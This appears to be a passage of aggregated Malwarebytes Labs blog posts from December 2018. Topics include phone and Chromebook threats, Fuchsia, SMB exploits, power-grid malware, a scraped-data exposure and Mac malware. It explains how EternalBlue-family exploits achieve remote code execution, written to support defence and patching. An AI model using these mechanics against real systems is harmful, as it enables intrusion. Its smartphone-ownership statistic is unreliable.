For a long time, people have said that Macs don’t get viruses. People have also said that the Mac App Store is the safest place to download apps. The same has been said of Chrome OS. Unfortunately, neither is actually true. Apps from the Mac App Store are sandboxed, just like the ones from Google Play on Chrome OS.

That hasn’t stopped criminals from making lots of money off the Mac App Store, however. I’ve documented many Mac App Store apps over the last few years that have defrauded users in a variety of ways. None of them have required root permissions, or exploits, or any other advanced malware techniques. Yet they have stolen user data and scammed users out of their money. I’ve worked hard to identify these apps, ensure that they are detected by Malwarebytes for Mac, and get them removed from the App Store when possible.

There should be no false illusions that Chrome OS is any different; it is not. The same tricks that are so successful on macOS can be equally effective on Chrome OS, and Malwarebytes has top-notch mobile malware researchers who work hard every day to keep Android and Chromebook users safe from such threats.

But does my Chromebook really need antivirus?

Since there is, definitively, already malware that can affect Chromebooks, it’s reasonable to install antivirus software on a Chromebook. And since Chromebooks are increasing in popularity, it’s also reasonable to assume cybercriminals will continue to develop more malware to get their piece of the pie. Once Pandora’s Box has been opened for a device, operating system, browser, or other platforms, we’ve never once seen the bad guys back away from it.

However, there is a catch to all of this. And to discover the catch, you must first answer this question: Does your Chromebook support Google Play?

Not all Chromebooks do. If yours does not, it cannot download malware through Google Play, much less third-party app stores, because it cannot download any apps at all. In such a case, you could use the free Malwarebytes browser extension beta for protection against browser-based attacks such as phishing or malicious websites and tech support scams, and that would be the most security you’d need (at the moment).

For those with Google Play, sure, you could simply try being careful about what you download. However, anyone can potentially be tricked by just the right malicious app with a large number of fake 5-star ratings, or just the right scam. If that concerns you, Malwarebytes for Android (and Chrome OS) is here to help.

The post Yes, Chromebooks can and do get infected appeared first on Malwarebytes Labs.

Categories: Techie Feeds

All the reasons why cybercriminals want to hack your phone

Malwarebytes - Tue, 12/18/2018 - 16:00

When people think of hacking, most imagine desktop computers, laptops, or perhaps even security cameras. However, in recent years, cybercriminals have expanded their repertoire to include smartphones, too. Here are 10 reasons why they may be looking to hack your phone.

1. To infect it with malware

Many smartphone users assume they can stay safe from malware and other threats by installing antivirus apps on their phones and being extra careful about the websites they visit. They typically don’t expect their phones to have malware out of the box. However, researchers showed that’s what happened with more than three dozen Android models, typically from lesser-known brands.

The phones had Trojan malware installed on them before they reached users, and the culprit appeared to be a software vendor in Shanghai that was a shared reseller for a brand of antivirus software. Although it’s not clear what the hackers wanted to do after infecting the phones, the malware was particularly hard to remove. Often, it involved fully reinstalling the operating system.

2. To eavesdrop on calls

People use their phones to speak to loved ones, discuss business plans, talk about their travels—all manner of personal, intimate content. So, it’s not surprising that criminals would want to break in and listen, whether to case a target or simply for voyeuristic pleasure. But how do they do it?

There’s a flaw in US cellular exchange, the vulnerability known as SS7, which allows hackers to listen to calls, read texts, and see users’ locations after learning their phone numbers. Even though US agencies know about the issue, they haven’t taken decisive action to fix it, leaving Americans’ phone privacy at risk.

3. To steal money

Ransomware attacks cause headaches for computer users by making the affected machines lock up or holding files hostage until people pay the ransom to restore access. Even then, paying doesn’t guarantee a return to proper functionality. Ransomware doesn’t only affect computers, though. There’s a recent trend of mobile ransomware, which often originates from malicious, third-party apps.

In one example, a third-party app promised to optimize the Android system but actually tricked people into transferring $1,000 from their PayPal accounts. The login process was legitimate, so it wasn’t a phishing attempt. However, once people logged in, a Trojan automated the PayPal transfer.

4. To blackmail people

The crime of blackmail isn’t new, but threat actors recognize that the small computer in people’s pockets and purses likely has more personal information stored in it than a desktop or laptop. And they are able to first cut people off from accessing their phones before then threatening to leak the information they find.

Criminals may start the hack after obtaining some personal information from a victim that available on the black market due to a previous, unrelated breach. They then use that information to contact the victim’s phone company and pose as the user, saying that they want to transfer the number to a new phone. Phone companies often provide such services and can automatically transfer information, including phone numbers, to a new device. The trouble is that in this case, the old phone still works but it’s useless to the person who owns it.

After hackers take over a phone in this way, the stage is set for more serious crimes—blackmail among them. If a person had essential numbers in their phone not backed up elsewhere, they could easily feel pressured to cave into hackers’ demands to avoid worse consequences.

5. To damage your phone

Hackers feel they’ve accomplished a goal by causing chaos for victims. One way to do that is to make the phone overheat and ultimately ruin it. Security researchers warned that hackers could break into a phone’s processor and use it for mining cryptocurrency. In addition to making the phone slow down, it can also cause the phone to get too hot or even blow up!

There are many reliable cooling devices used in cell phones for temperature management, even “intelligent” temperature management solutions that heat up your phone’s battery when it’s too cool and cool it down when it’s too hot. However, if hackers have their way, even those normally sufficient internal components could fail to keep the device cool enough.

One type of the cryptomining malware called Loapi is often hidden in apps that appear as downloadable games. Security researchers ran a test and found it actually made a phone battery bulge due to excessive heat after only two days.

6. To threaten national security

Countless analysts have chimed in to say that President Trump’s alleged use of insecure mobile devices could help foreign adversaries glean information about the United States that could threaten the nation or at least give information about the president’s intended actions.

In 2018, Billy Long, a Republican congressman, had his mobile phone and Twitter account hacked. Cybercriminals know that one of the primary ways politicians interact with followers is through social media.

Besides threatening national security more directly, these hackers could erode the trust politicians have built with their audiences, especially with fake posts that seem to come from the genuine account owners.

Cybercriminals know that by hacking the mobile phones and social media accounts of politicians, they are contributing to the overall public opinion that politicians cannot be trusted. Instead of looking to the source for information, users might instead look for news via sources that are even less reliable or strategically crafted to spread fake news.

7. For fun or notoriety

Some hackers get a thrill by successfully pulling off their attacks. Hacking is a source of entertainment for them, as well as an ego boost. If money isn’t the primary motivator for cybercriminals, then notoriety is might be a close second. Hackers may get into phones because it’s a newer challenge that might require more cutting-edge malware development techniques. Ultimately, many cybercriminals want approval from others in the industry and desire their respect.

8. To get payment information

E-wallets, which store payment information inside smartphone apps so people don’t have to carry real credit or debit cards, are convenient. However, their rising popularity has given hackers another reason to target phones.

Often, cybercriminals entice people to download fake mobile payment apps (of course believing they are real). Then, once people enter their payment information, hackers have the information needed to charge transactions to the cards.

9. Because so many people use it

Since hackers want their attacks to have significant payoffs, they know they can up their chances of having a major impact by targeting smartphones. Information published by the Pew Research Center shows 95 percent of Americans own smartphones. To put that in perspective, only 35 percent of the population did in 2011, when the organization first conducted a survey on smartphone ownership.

Also, different research from another organization reveals that mobile Internet usage is overtaking desktop time. People are becoming increasingly comfortable with using their smartphones to go online, browse, and even shop. As such, no matter what kind of hack cybercriminals orchestrate, they can find plenty of victims by focusing on smartphone users.

10. Because it’s an easy target

Research shows that mobile apps have rampant security problems. This gives criminals ample opportunity to infiltrate insecure apps rather than the phones themselves.

In one case, about 40 of the top 50 shopping apps had at least a few high-level security vulnerabilities that allowed hackers to see personal information or deceive users by luring them to dangerous apps that were copies of the originals.

Further research about problematic dating apps found that many of them give third parties access to unencrypted data through vulnerable software development kits (SDKs). Hackers know some apps achieve hundreds of thousands, or even millions. of downloads. If they can break into them, they’ll get fast access to the phones that have those apps installed and the people who use them.

How to stay protected

These examples show that hackers have a myriad of reasons to hack phones and even more ways to make it happen. One easy way to protect against attacks is to avoid third-party app stores and only download content from the phone’s legitimate app stores, such as Google Play or iTunes. However, threat actors can penetrate those platforms, too, and many an infected or rogue app has made its way through.

It’s also smart to keep tabs on phone statistics, such as battery life and the number of running apps. If those deviate too much from the norm, that’s a sign hackers may be up to no good in the background.

Running a mobile antivirus scan at least monthly, or installing an always-on cybersecurity program is another good strategy, but only if the application comes from a trustworthy source, such as the vendor’s official site.

Instead of being overeager to download new apps, people should ideally exercise caution and only do so if numerous sources of feedback indicate they are free from major security flaws. Some app development companies are in such a hurry to get to the market with their latest offerings that they do not make security a priority.

Besides these more specific tips, it’s essential for people to be highly aware of how they interact with their phones. For example, strange pop-ups or redirects in a phone’s browser, or random icons appearing without having downloaded a new app could indicate problems, and individuals should not assume that everything’s okay. When in doubt, it’s best to stop using the phone and get some answers—before hackers learn all they need to know about you.

The post All the reasons why cybercriminals want to hack your phone appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: Is Fuchsia OS the end of Android?

Malwarebytes - Mon, 12/17/2018 - 20:10

It’s no secret that every year Google announces a new Android version. This time though, recent Google documents state that the next major Android version will be Android Q and not Android 9.1 Pie.

In parallel, Google is also developing an operating system called Fuchsia that’s supposedly going to replace Android in the near future. People were expecting to see a statement from Google about Fuchsia, or Andromeda (its previous codename), back in October 2017. But that never happened. Instead, we get to speculate for another year about whether or not it’s here to replace Android, or is simply a playground for developers. Here’s what we know so far.

A brief history of Google Fuchsia

Fuchsia is a capability-based operating system with user interface, and it has the ability to scale up to larger devices like laptops and computers. Also, it can support ARM, MIPS, and x86 processors.

It first popped up on GitHub in August 2016 with zero fanfare or explanation from Google. Unlike Android and Chrome OS, Google Fuchsia is not based on Linux, but rather Google’s own new microkernel.

In May 2017, an experimental OS leaked. However, it calling it an “OS” might be a misnomer. Basically, its system UI was up and running on top of Android and functioning like an app, but nothing else worked. Later, one of the developers working on the project teased that this was not just a dumping ground but a real project. This led to speculation that Google had larger plans for it.

Not long after, at the beginning of 2018, Google released news that the Fuchsia team picked the Chrome OS-powered Google Pixelbook as a supported device. A couple of curious users rushed out to test this claim. They confirmed that they were able to run Fuchsia on these Google Pixelbooks. This was one more big step forward. Since then, we’ve heard nothing more. However, we do know the components of Fuchsia, and they look promising.

The Fuchsia layer cake

Let’s take a closer look under the hood of this potential future Google OS. There are four distinct layers that hold the whole operating system together. Google uses a layer cake model when describing the organization of Fuchsia code, and we will not deviate from this scheme. So, let’s talk about each layer separately and in detail.

Zircon

It all starts with Zircon(formerly Magenta), the Fuchsia Operating System’s new microkernel, which is based on LK (Little Kernel), a small operating system intended for embedded devices. Zircon operates as a foundation on which the Fuchsia house foundation is built, and it primarily handles access to hardware and communication between software.

Garnet

The next layer, which sits atop Zircon, is called Garnet. Garnet consists of services needed for the OS, such as its network and graphics, together with the package manager and device drivers. Some of them worth mentioning here: Escher, a Vulkan-based graphics renderer with specific support for Volumetric soft shadows; Amber, Fuchsia’s update system; and Xi Editor,  modern editor with a backend written in Rust.

Peridot

The next layer up, Peridot, mostly handles Fuchsia’s modular runtime app design for composition. What this means is almost everything that exists in Fuchsia, such as software and even system files, are in packages. And Fuchsia packages can be made up of smaller components instead of large, all-in-one programs. One of the major components of Peridot is Ledger. Ledger is a storage system for Fuchsia, and it provides and manages separate data stores for apps/components across devices, syncing everything through a cloud provider.

Topaz

Topaz is the top layer and the one you’ll mostly likely interact with. It’s similar to Android’s pre-installed (factory) applications like messaging, contacts, phone, camera, and music. The most important part is the introduction of Flutter support. Flutter is a software development kit allowing cross-platform development abilities for Fuchsia, Android, and iOS. Flutter produces apps based on Dart, an open-source, scalable programming language with robust libraries and runtimes for building web, server, and mobile apps. Due to the Flutter software development kit offering cross-platform opportunities, users are able to install parts of Fuchsia on Android devices.

In addition, Google already announced Flutter 1.0 is out. The first stable release of Google’s UI toolkit for creating native experiences for iOS and Android from a single codebase is available at https://flutter.io.

Final thoughts

Let’s sum it up. Here’s what we know so far:

  • Google Fuchsia is a new OS in development from Google, but is still a ways off from completion.
  • The OS is based on the Zirkon kernel, which makes it highly scalable and secure.
  • Flutter, a software development kit offering cross-platform opportunities, is already out.

Although Google said Fuchsia is just “one of many experimental open-source projects” at the company, we can already see a potential OS brewing that could replace Android. Microsoft once tried to create something similar with the code name Singularity, but they totally failed. That’s why there’s a big question mark if Fuchsia will actually replace Android and Chrome OS, or putter out like some of its predecessors.

Also, let’s remember that Android was hanging around for about five years before it launched in a real product. If Fuchsia follows a similar path, and everything goes well, maybe we can expect a consumer product sometime around 2020. Right now, it’s still a giant maybe. So if you’re feeling stressed about learning a new OS, there is still plenty of time to adjust—save the panicking for later in 2019.

The post Mobile Menace Monday: Is Fuchsia OS the end of Android? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (December 10 – 16)

Malwarebytes - Mon, 12/17/2018 - 17:58

Last week on Labs, we took a look at some new Mac malware, a collection of various scraped data dumps, the protection of power grids, and how bad actors are using SMB vulnerabilities

Other cybersecurity news
  • Millions affected by Facebook photo API bug: An issue granted third-party apps more access to photos than should normally be granted, including images uploaded but not published. (source: Facebook)
  • Bomb threats may be a hoax: An email in circulation urging ransom payments in Bitcoin lest bombs across the US be detonated may well be a fake, according to US law enforcement. (source: The Register)
  • Man jailed for fraud offenses: A man in the UK has been jailed for taking part in fraudulent activities. The main point of interest is surely the spectacular device he built. (source: Met Police)
  • Another Google Plus bug: For six days, developers were able to access profile data not made public by the users. (source: Google)
  • Windows 10 data collection: Reddit users complained Windows 10 is grabbing a certain kind of data even with the setting disabled. (source: How to Geek)
  • Taylor Swift concert tracks stalkers with facial recognition software: At a recent event, cutting-edge tech was deployed to ensure the crowds were free of potential troublemakers. (Source: Rolling Stone)
  • Password disasters of 2018: A tongue in cheek look at some of the more spectacular password mishaps seen rumbling into view this year. (Source: Help Net Security)
  • Android Trojan steals from PayPal accounts: Even with 2FA enabled, it might not be enough to keep your account balance safe. (Source: ESET)
  • Character recognition collects URLs in YouTube videos: Theoretically private data in hidden videos may not be as private as you’d first hoped. (Source: Austin Burk’s blog)
  • Traveller data left lying around on USB sticks: Border Agents aren’t being quite as careful as they should be where potentially sensitive passenger data is concerned. (Source: Naked Security)

Stay safe, everyone!

The post A week in security (December 10 – 16) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How threat actors are using SMB vulnerabilities

Malwarebytes - Fri, 12/14/2018 - 16:00

Some of the most devastating ransomware and Trojan malware variants depend on vulnerabilities in the Windows Server Message Block (SMB) to propagate through an organization’s network. Windows SMB is a protocol used by PCs for file and printer sharing, as well as for access to remote services.

A patch was released by Microsoft for SMB vulnerabilities in March 2017, but many organizations and home users have still not applied it. So now, the unpatched systems allow threats that take advantage of these vulnerabilities inside, helping active malware campaigns spread like Californian wildfire.

SMB vulnerabilities have been so successful for threat actors that they’ve been used in some of the most visible ransomware outbreaks and sophisticated Trojan attacks of the last two years. In fact, our product telemetry has recorded 5,315 detections of Emotet and 6,222 of TrickBot in business networks—two Trojan variants that are using the SMB vulnerabilities—in the last 30 days alone.

What makes them so effective?

What makes some malware so widespread is the way in which it propagates. While massive spam campaigns only render a few victims that actually pay off, a worm-like infection that keeps spreading itself requires little effort for multiplying returns. And that’s exactly what the SMB vulnerabilities allow their payloads to do: spread laterally through connected systems.

For example, WannaCry ransomware (also known as WannaCrypt), which used one of the SMB vulnerabilities, was launched in May 2017, yet the infection continues to expand. Below is the graph that shows our telemetry for Ransom.WannaCrypt for the month of November 2018.

It’s been more than 1.5 years, and WannaCry continues to proliferate, thanks to the sheer number of unpatched machines connected to infected networks.

How did this come about?

At the moment, there are three exploits in the wild that use SMB vulnerabilities. These exploits have been dubbed EternalBlue (used by WannaCry and Emotet), EternalRomance (NotPetya, Bad Rabbit, and TrickBot), and EternalChampion. There is a fourth exploit called EternalSynergy, but we have only seen a Proof of Concept (PoC)—nothing has appeared yet in the wild.

All these exploits were leaked by the ShadowBrokers Group, who allegedly stole them from the NSA. Less then a month after ShadowBrokers published their “findings,” the first fully functional malware that used the EternalBlue exploit, WannaCry, was found in the wild.

Since then, multiple large-scale malware attacks have relied on the SMB vulnerabilities to penetrate organizations’ networks, including the NotPetya and Bad Rabbit ransomware campaigns in 2017, and now the Emotet and TrickBot Trojan attacks, which have been ongoing through the third and fourth quarter of 2018.

Let’s now take a closer, more technical look at each exploit and how they work.

EternalBlue

A bug in the process of converting File Extended Attributes (FEA) from OS2 structure to NT structure by the Windows SMB implementation can lead to a buffer overflow in the non-paged kernel pool. This non-paged pool consists of virtual memory addresses that are guaranteed to reside in physical memory for as long as the corresponding kernel objects are allocated.

A buffer overflow is a programming flaw that lets the data written to a reserved memory area (the buffer) go outside of bounds (overflow), allowing it to write data to adjacent memory locations. This means attackers are able to control the content of certain memory locations that they should not be able to access, which attackers then exploit to their advantage. In the case of EternalBlue, they are able to control the content of a heap that has execution permission, which leads to the Remote Code Execution (RCE) vulnerability, or the ability to execute commands on a target machine over the network.

EternalRomance

Eternal Romance is an RCE attack that exploits CVE-2017-0145 against the legacy SMBv1 file-sharing protocol. Please note that file sharing over SMB is normally used only on local networks, and the SMB ports are typically blocked from the Internet by a firewall. However, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise.

At the core of this exploit is a type confusion vulnerability. Type confusion vulnerabilities are programming flaws that happen when a piece of code doesn’t verify the type of object that is passed to it before using it. Type confusion can allow an attacker to feed function pointers or data into the wrong piece of code. In some cases, this can lead to code execution.

In other cases, type confusion vulnerability leads to an arbitrary heap write, or heap spray. Heap spraying is a method typically used in exploits that places large amounts of code in a memory location that the attacker expects to be read. Usually, these bits of code point to the start of the actual code that the exploit wants to run in order to compromise the system that is under attack.

After the spray has finished, the exploit uses an info leak in a TRANS_PEEK_NMPIPE transaction. It uses the info leak to determine whether the target is running a 32- or 64-bit version of Windows and to get kernel pointers for various SMB objects.

EternalChampion

The issue exploited by EternalChampion is a race condition in how SMBv1 handles transactions. A race condition, or race hazard, is the behavior of a system where the output depends on the sequence or timing of other uncontrollable events. It becomes a bug when events do not happen in the order the programmer intended. Sometimes these bugs can be exploited when the outcome is predictable and works to the attackers’ advantage.

Meanwhile, a transaction is a type of request that can potentially span multiple packets. For example, if a request is too large to fit in a single server message block (SMB), a transaction of the appropriate size can be created, and this will store the data as it is received from multiple SMBs.

This vulnerability is exploited in two ways: first for an information leak, and second for remote code execution. The bug is first exploited to leak pool information via an out-of-bounds read. To do this, a single packet containing multiple SMBs is sent to the server. This packet contains three relevant pieces:

  • A primary transaction request that will immediately be executed.
  • A secondary transaction request that triggers the bug caused by the race condition.
  • Sets of primary transactions that heap spray the pool with the intention to place a transaction structure immediately behind the one that tracks the first primary transaction request.

First, a transaction is created that contains the shellcode. This does not start the exploit, it just contains the second stage payload. Next, a packet is sent that contains multiple SMBs. The packet contains all expected transaction data and immediately begins execution.

The secondary transaction handler copies the secondary transaction request’s data if it fits in the buffer. Except due to the race condition, the pointer now points to the stack of the primary transaction request handlers’ thread (as opposed to the expected pool buffer). This allows an attacker to write their data directly to the stack of another thread.

The attacker has control over the displacement, so they can choose the amount of data to copy and then copy it. This allows them to precisely overwrite a return address stored on the stack of the primary transaction request handler’s thread, and results in the ability for Remote Code Execution.

EternalSynergy

The Proof of Concept for EternalSynergy shows that incoming SMB messages are copied by an initial handler into the corresponding transaction buffer. But the handler automatically assumes that the provided address is the beginning of the buffer. However, during a write transaction, the same address is automatically assumed to be the end of the existing data, and the address pointing to the beginning of the buffer is updated accordingly.

This means that an attacker can construct a secondary message in the transaction to point beyond the start of the buffer, resulting in a buffer overflow during the copy action.

EternalRocks

Looking for information about these SMB exploits, you may also run into an exploit called EternalRocks. EternalRocks was not included in the ShadowBrokers release, but was instead constructed and discovered later. EternalRocks uses seven NSA tools where, for example, WannaCry only used two (EternalBlue and another called DoublePulsar).

Prevention and remediation

Despite the significant power SMB vulnerabilities afford to attackers, there is one simple remedy to prevent them from ever becoming problematic.

Patch your systems.

The Windows Operating Systems vulnerable to the attacks found in the wild all predate Windows 10. Most attacks work only on Windows 7 and earlier, and Microsoft released patches for the vulnerabilities that were leaked under the Microsoft Security Bulletin MS17-010. This leaves little-to-no reason for networks to be vulnerable to these attacks, yet the number of current victims is overwhelming.

By applying the patch released by Microsoft in 2017, all your eternal headaches can magically disappear. And for extra measure, we also recommend you patch and update all systems, browsers, and software as soon as possible to shore up any other potential vulnerabilities in the network.

In addition, many cybersecurity solutions, including Malwarebytes Endpoint Protection, offer innovative anti-exploit technology that can block threats such as EternalBlue from ever dropping their payloads and infecting systems.

For example, Malwarebytes’ anti-exploit module detected WannaCry as Ransom.WannaCrypt right from the start. Below, we created a heat map using our telemetry, showing where the infection started and how fast it spread across the globe.

It is for good reason that most cybersecurity guides advise users to patch quickly and keep systems updated. So many of the infections seen today could be avoided with consistent monitoring and basic computer maintenance. Unfortunately, a lot of businesses believe they do not have the time or manpower to follow this advice. But when companies leave their networks unprotected, they compromise the integrity of all of our online experiences—especially when SMB vulnerabilities allow infections to spread so quickly.

Don’t be one of those companies. Get protected and stay updated!

The post How threat actors are using SMB vulnerabilities appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Compromising vital infrastructure: the power grid

Malwarebytes - Thu, 12/13/2018 - 16:00

Where were you when the lights went out? That line became famous after the 1977 blackout in New York City. This power outage was caused by lightning and lasted for up to two days, depending on which part of New York you lived in. While in this case the power grid failure was a freak incident due to faulty backup equipment, it is still famous for the havoc it wreaked throughout the city—including looting and arson—during a time when national morale was already low.

Now imagine something similar happening today. Would it result in the same criminal chaos? My guess is it would depend on the circumstances and how much time it takes to restore power. Let’s hope we never find out.

Power grid hardware

The underlying hardware of the power grid has gone through a lot of improvements since 1977. And so have backup systems and procedures.

In many countries, a power interruption that lasts longer than a given threshold gives the consumer the right to claim damages from the power company. These damages are to be paid by the electricity distributor. The amount of the customer compensation and the threshold can be vary from one country to another, but you can usually look them up on the website of your provider.

This is not to say that it’s impossible to do physical damage if an attacker is determined enough, as the 2013 sniper attack on a California energy grid substation demonstrated.

Recent regulations and improvements have made it rare to experience power outages of more than a few hours in the western world—unless there are special circumstances, such as natural disasters. Tornadoes, hurricanes, earthquakes, erupting volcanoes, flooding, and wildfires can cause power outages, which makes dealing with those disasters even more difficult. Any other power outages are usually restored quickly or covered by backup systems.

Malware

We are aware of several malware variants that are used against power supplies, and some of them can be held responsible for major power outages around the globe.

Stuxnet is a worm designed to spread through Windows systems and go after certain programmable controllers by seeking out the software related to these controllers. Stuxnet is believed to be specifically designed to destroy the Iranian nuclear program, but it can also be used to bring down power plants.

A group of hackers dubbed Sandworm and suspected to be based in Russia shut down the Ukrainian power grid in December 2015 using a malware called BlackEnergy. The malware opened a backdoor that allowed the attackers to control infected machines to a level where they were able to cross over into the operational network. Once there, they started to flip switches, disabling IT infrastructure and deleting files. Earlier in 2014, the US government reported that hackers had planted BlackEnergy on the networks of American power and water utilities, but nothing came of it.

If any countermeasures were taken in the Ukraine, they turned out to be insufficient or at least unable to withstand CrashOverRide. CrashOverRide, aka Industroyer, is an adaptable malware that can automate and orchestrate mass power outages. The power grid–sabotaging malware was likely the one they used in the December 2016 cyberattack against Ukrainian electric utility Ukrenergo. The CrashOverRide malware can control legacy electricity substations’ switches and circuit breakers, allowing an attacker to simply turn off power distribution, leading to cascading failures and causing more severe damage to equipment.

Dragonfly, aka Energetic Bear, is a malware campaign that uses a variety of infection vectors in an effort to gain access to a victim’s network, including malicious emails, watering hole attacks, and Trojanized software. Part of this campaign was a malicious email disguised as an invitation to a New Year’s Eve party to targets in the energy sector in December 2015.

Sandworm malware, discovered in 2014, uses a vulnerability to launch external files from a malicious Powerpoint file. In a Sandworm attack, the malicious Powerpoint file pulls in two files from a remote server that combine to deliver the malware payload. Sandworm has been used in targeted attacks against NATO, the European Union, and companies in the telecommunications and energy sectors.

Backup systems

It may seem obvious to point out that critical systems like hospitals should have independent emergency power backup systems. And most of them do. But are they tested regularly for functionality? Do they have enough supplies to last during a prolonged power outage? Is there an option to turn them on manually if they fail to kick in automatically? And is someone available on premise who knows how to do this?

Emergency power systems come in many shapes and sizes. Standby generators are probably the most well-known, and they rely on some kind of fuel to provide emergency power. Batteries, for example, use stored power and release this power when it’s needed. But batteries are generally only a solution for hours rather than days, and they tend to lose some power even when they are not in use. It is imperative to find a backup solution that is robust enough to meet your needs in a worst-case scenario.

Energy sources

Theoretically, there are other ways to frustrate the power grid. For example, by cutting off the resources we use to run the power plant, such as coal, water, wind, solar, nuclear, and natural gas. This is a good reason to use a wide variety of resources, and another excellent reason to use renewable energy. There is also good reason why OPEC has a lot of influence in the world of today.

To show that hacking into power supplies is not entirely theoretical, we want to mention that Iranian hackers infiltrated the control system of a small dam less than 20 miles from New York City in 2013. Unfortunately, many power plants are still accessible from the Internet in unnecessary ways that endanger their cybersecurity.

Countermeasures

Criminals have tools at their disposal with the capability to cause serious damage to the power grid. Therefore, the power industry must take precautions and upgrade cybersecurity to keep their systems safe. And they should do more than just abide by the minimum-security standard. Power grid exploitation companies and their suppliers should have themselves tested on their ability to withstand cyberattacks on a regular basis.

This is especially true for nuclear power plants, where a loss of control can have more catastrophic consequences than just the loss of power output. Since 9/11, every company operating nuclear power plants has had an NRC-approved cybersecurity program in place, but cybersecurity was not such an issue when these plants were designed.

Besides cybersecurity, there are physical measures a government could enforce to improve the stability of a stressed power grid. As Joshua Pearce, a professor of electrical and computer engineering at Michigan Technological University, put it:

If we want to have a secure grid and go full throttle on renewable energy, what it means is we need to break up the grid into a bunch of microgrids that still act together as a full grid, so that we still have all the benefits that we have today with our giant centralized grid while still having the security.

In an attack, such a microgrid could be taken out without having an ill effect on all the other microgrids—which would make a successful attack less disastrous.

It would also stand to reason to take heed of the advice of Energy Secretary Rick Perry, who told lawmakers at an appropriations hearing that cyberattacks are literally happening hundreds of thousands of times a day. He warned that the Department of Energy needs an office of cybersecurity and emergency response in order to be prepared for threats like this in the future. And looking at what’s already taken place, plus what is vulnerable to attack: We have to agree.

The post Compromising vital infrastructure: the power grid appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Data scraping treasure trove found in the wild

Malwarebytes - Tue, 12/11/2018 - 16:56

We bring word of yet more data exposure, in the form of “nonsensitive” data scraping to the tune of 66m records across 3 large databases. The information was apparently scraped from various sources and left to gather dust, for anyone lucky enough to stumble upon it.

What is data scraping?

The gathering of information from websites either by manual means, which isn’t time optimal, or by automated processes such as dedicated programs or bots. Often, this data scraping is for nefarious purposes and can be used for marketing or simply threatening behaviour. It also typically relies on the person being scraped to have provided much of the grabbable data upfront. It’s frowned upon, but it’s often unclear where things stand legally.

Scrape all the things

Three large databases were found by security researchers, containing a combined tally of 66,147,856 unique records. At least one instance was exposed due to a lack of authentication. The records are very business-centric, with one (for example) containing full name, email, listed location, employment history, and skills. This sounds very much like the information you see on a public facing Linkedin profile. Indeed, many people have said they received breach notifications to their Linkedin specific mail, and there’s some mention of Github too.

Elsewhere, some 22 million records were found on the second server. This related to job search aggregation data, and this included IP, name, email, and potential job locations. Number 3 sang to the tune of 48 million records, and also sounds like a generic business-centric dump. Name, phone, employer, and so on.

Is the threat serious?

The information collected isn’t exactly a red hot dump of personal information, but it’s certainly useful for phishing attempts. It could also prove useful to anyone wanting a ready made marketing list. The big problem is that even if the ones doing the data scraping had no harmful intentions, that may not apply to anybody finding the treasure trove.

Given how this information was stumbled upon in the first place, there’s no real way to know how many bad actors got their hands on it first.

How can I reduce the scraping risk?

Well, that’s a good question. Given that the data was (mostly) freely given online in terms of the Linkedin profile information, it’s all about personal choice. Take a look at your Linkedin right now. Are you happy with what’s on display? Have you hidden any of it? Perhaps it’s a good idea to remove older roles, or jobs of a sensitive nature. Maybe that phone number doesn’t need to be so prominent. How about location, does it have to be so precise? Or would a broader area suffice?

Unfortunately, many people don’t consider the information they place online to be harmful, until it suddenly is. By the time it’s been scraped, plundered, and jammed into a larger database, it’s already too late to do anything about it.

The only real solution is to control every last aspect of what you’re happy to place in front of everybody else, which for most people involves having to dredge up a list of sites and accounts then start stripping things out. That’s fine; it’s never too late to start pulling things offline that don’t need to be there.

Next steps for anyone affected?

Given the very prominent business angle to this one, it’d be wise to consider who may look to take advantage of it. Alongside the previously mentioned phishers, this is the kind of thing someone could use alongside the offer of fake jobs. If you want to become a money mule, this could definitely be the “perfect” lead in!

A common destination for business-centric grab bags such as this one are unremarkable job search sites. Be on the look out for a flood of poor quality job offer spam. Be especially wary if they come bearing gifts of paid membership, as nobody should pay someone grabbing your data free of charge then using it to spam them with nonsense.

Ah yes, spam.

Scraped email lists will inevitably be harvested, readjust quality filters if needed. The good news is, most email offerings do a pretty good job of keeping your mailbox clean.

Almost all of us will end up in a data dump at some point. Whether scraped or hacked, being cautious around strange phonecalls and peculiar emails will go a long way towards minimising any further potential harm.

The post Data scraping treasure trove found in the wild appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Flurry of new Mac malware drops in December

Malwarebytes - Tue, 12/11/2018 - 16:00

Last week, we wrote about a new piece of malware called DarthMiner. It turns out there was more to be seen, as not just one but two additional pieces of malware had been spotted. The first was identified by Microsoft’s John Lambert and analyzed by Objective-See’s Patrick Wardle, and the second was found by Malwarebytes’ Adam Thomas.

A Word document with a malicious macro

Lambert identified a malicious Microsoft Word document containing a malicious Visual Basic macro in a Tweet that provided a VirusTotal link to the file. Wardle analyzed the document, which was named BitcoinMagazine-Quidax_InterviewQuestions_2018.docm, and the payload that it dropped.

Ordinarily, macros in Microsoft Office documents are sandboxed, meaning that they shouldn’t have any ability to make changes to the file system. However, in this case, the document uses a sandbox escape to create a launch agent on the system. This launch agent provides persistence to a Python script that sets up a Meterpreter backdoor.

Interestingly, this malware is a copy-and-paste job from a proof-of-concept published by Adam Chester back in February, even down to recycling the identifiers referring to Chester’s blog site, except that Chester hypothesized using EmPyre instead of Meterpreter as the backdoor.

Of course, the attack relies on the user opening a malicious Word document and allowing the macros to run, so social engineering is the main snare. As long as you never, ever allow macros to run in Microsoft Office documents, you’re safe from this kind of malware.

A malicious Discord imitator

On Friday, Adam Thomas found a malicious copy of Discord, an app for gamers to communicate with other gamers. However, this copy of Discord didn’t seem to do anything, because it was actually an Automator script that did nothing for the user.

The script, shown in edited form above to fit in a screenshot, decodes and executes a Python payload, then begins repeatedly taking screenshots and uploading them to a command-and-control (C&C) server.

The decoded payload included quite a bit of Python code, including two additional snippets of base64-encoded Python. One of these bits of code set up an EmPyre backdoor:

